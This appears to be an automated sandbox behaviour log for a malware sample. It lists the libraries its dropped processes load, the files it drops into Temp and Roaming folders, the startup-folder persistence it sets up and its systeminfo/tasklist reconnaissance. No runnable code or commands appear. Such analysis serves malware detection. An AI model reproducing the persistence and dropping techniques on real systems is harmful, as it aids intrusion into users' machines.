Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comSection loaded: slc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comSection loaded: pcacli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comSection loaded: sfc_os.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scrSection loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scrSection loaded: version.dll
Source: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scrSection loaded: winmm.dll
Source: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scrSection loaded: mpr.dll
Source: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scrSection loaded: wininet.dll
Source: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scrSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scrSection loaded: userenv.dll
Source: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scrSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scrSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scrSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scrSection loaded: wldp.dll
Source: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scrSection loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scrSection loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scrSection loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scrSection loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scrSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scrSection loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scrSection loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scrSection loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sxs.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeSection loaded: apphelp.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: framedynos.dll
Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: esscli.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: file.exeStatic file information: File size 1245183 > 1048576
Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C.pdb source: azvw.exe, 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmp, nircmdc.exe.52.dr
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
Source: 7zxa.dll.52.drStatic PE information: real checksum: 0x0 should be: 0x316b6
Source: 7za.dll.52.drStatic PE information: real checksum: 0x0 should be: 0x4352d
Source: zip.exe.52.drStatic PE information: real checksum: 0x0 should be: 0x30da3
Source: nircmdc.exe.52.drStatic PE information: real checksum: 0x0 should be: 0x157f0
Source: file.exeStatic PE information: real checksum: 0x138e94 should be: 0x139977
Source: 7za.exe.52.drStatic PE information: real checksum: 0x0 should be: 0xae01b
Source: 7zxa.dll.52.drStatic PE information: section name: .sxdata
Source: 7za.dll.52.drStatic PE information: section name: .sxdata
Source: 7za.exe.52.drStatic PE information: section name: .sxdata
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: 52_2_0041B280 push eax; ret 52_2_0041B2AE
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeCode function: 88_3_007F990C push ebp; iretd 88_3_007F990D
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeCode function: 88_3_0080E110 push ds; iretd 88_3_0080E122
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeCode function: 88_3_0080C340 push eax; ret 88_3_0080C341
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeCode function: 88_3_007FC7AC push ebp; iretd 88_3_007FC7AD
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeCode function: 88_3_0080C364 push eax; ret 88_3_0080C365
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1

Persistence and Installation Behavior

barindex
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\768032\Finish.comJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\303482\Either.pifJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comFile created: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scrJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\768032\Finish.comJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comFile created: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeFile created: C:\Users\user\AppData\Roaming\DolphinDumps\zip.exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeFile created: C:\Users\user\AppData\Roaming\DolphinDumps\7za.dllJump to dropped file
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\RockyJump to dropped file
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeFile created: C:\Users\user\AppData\Roaming\DolphinDumps\PsInfo64.exeJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\303482\Either.pifJump to dropped file
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeFile created: C:\Users\user\AppData\Roaming\DolphinDumps\7zxa.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeFile created: C:\Users\user\AppData\Roaming\DolphinDumps\PsInfo.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comFile created: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scrJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comFile created: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeFile created: C:\Users\user\AppData\Roaming\DolphinDumps\nircmdc.exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeFile created: C:\Users\user\AppData\Roaming\DolphinDumps\7za.exeJump to dropped file
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\RockyJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoSphere.urlJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoSphere.urlJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
